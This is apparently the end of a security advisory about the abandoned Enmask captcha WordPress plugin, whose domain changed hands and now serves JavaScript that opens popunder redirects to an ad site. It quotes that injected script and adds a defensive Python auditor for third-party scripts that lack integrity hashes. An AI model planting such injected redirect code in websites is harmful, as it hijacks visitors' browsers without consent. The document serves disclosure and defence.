http://findbetterresults[.]com/?dn=enmask.com&pid=9PO755G95

The redirect is caused by the following JavaScript which gets returned when requesting any JavaScript file from the domain; it looks like the new owner of the domain is doing this intentionally:

if (typeof _popwnd == 'undefined') {
    var _popwnd = -1;
    function _popwnd_open() {
        if (_popwnd != -1) return;
        _popwnd = window.open('hxxp://findbetterresults.com/?dn=enmask.com&pid=9PO755G95', '_blank', '');
        _popwnd.blur();
        window.focus();
    }
};
window.addEventListener('click', _popwnd_open);

If you happen to be using this plugin, we highly recommend removing and/or replacing it with another one which is still supported and could provide you similar functionalities.

Loading images and/or scripts from external websites is not recommended (exceptions may apply, such as big CDNs or services like Facebook or ad networks), for several reasons:

  • If your website's look and feel, or even its functionality, relies on those external resources, any availability issue they have will affect your website;

  • If the resource you fetch content from is compromised, or its domain changes hands as described in this labs note, your site may be used to distribute unwanted (even malicious) content without your consent.
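A way to inventory this exposure, added here as a Python example and not part of the original note: list every third-party resource a page loads and flag active content (scripts, stylesheets, frames) that carries no Subresource Integrity hash. SAMPLE_HTML is constructed around the Enmask tag quoted above (written undefan ged so it parses), plus a local script, a CDN library with a placeholder integrity value and a remote image. Caveat: an integrity attribute would have made the browser refuse the changed Enmask.Captcha.js, but SRI only works for files the third party serves unchanged; a live service script that updates itself legitimately would break, so for those the real fix is the one the note gives, removing the dependency.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment: the Enmask Captcha tag quoted above (undefanged so it
# parses), a relative stylesheet, an SRI-protected CDN library (placeholder hash),
# a local jQuery and a remote image.
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="/wp-content/themes/demo/style.css">
<script type="text/javascript" data-enmask-langcode="en-US" src="http://enmask.com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>
<script src="https://cdn.example-cdn.net/lib/1.2.3/lib.min.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="/wp-includes/js/jquery/jquery.js"></script>
</head><body><img src="https://img.example.org/banner.png"></body></html>
"""

ACTIVE_TAGS = {'script', 'link', 'iframe'}          # content the browser runs or applies
TAG_ATTR = {'script': 'src', 'link': 'href', 'iframe': 'src', 'img': 'src'}


class ResourceCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.resources = []                          # (tag, url, has_integrity)

    def handle_starttag(self, tag, attrs):
        attr = TAG_ATTR.get(tag)
        if attr is None:
            return
        a = dict(attrs)
        if tag == 'link' and 'stylesheet' not in (a.get('rel') or '').lower():
            return                                   # icons, preloads etc. are not active content
        url = a.get(attr)
        if url:
            self.resources.append((tag, url, 'integrity' in a))


def audit_external_resources(html, site_host):
    """Every resource loaded from a host other than site_host."""
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, url, has_sri in parser.resources:
        host = urlparse(url).hostname
        if host is None or host == site_host.lower():
            continue                                 # relative or same-origin
        findings.append({'tag': tag, 'host': host, 'url': url,
                         'active': tag in ACTIVE_TAGS, 'sri': has_sri})
    return findings


def missing_sri(findings):
    """Third-party active content the browser will run without any integrity check."""
    return [f['host'] for f in findings if f['active'] and not f['sri']]


if __name__ == '__main__':
    found = audit_external_resources(SAMPLE_HTML, 'shop.example.com')
    for f in found:
        print(f['tag'], f['host'], 'SRI' if f['sri'] else 'no SRI')
    print('unverified third-party code from:', missing_sri(found))
```

Run it over the rendered HTML of a few key pages (not only the theme source, since plugins inject tags at runtime) and keep the list of hosts; a host that appears there is a domain whose expiry and ownership you now depend on.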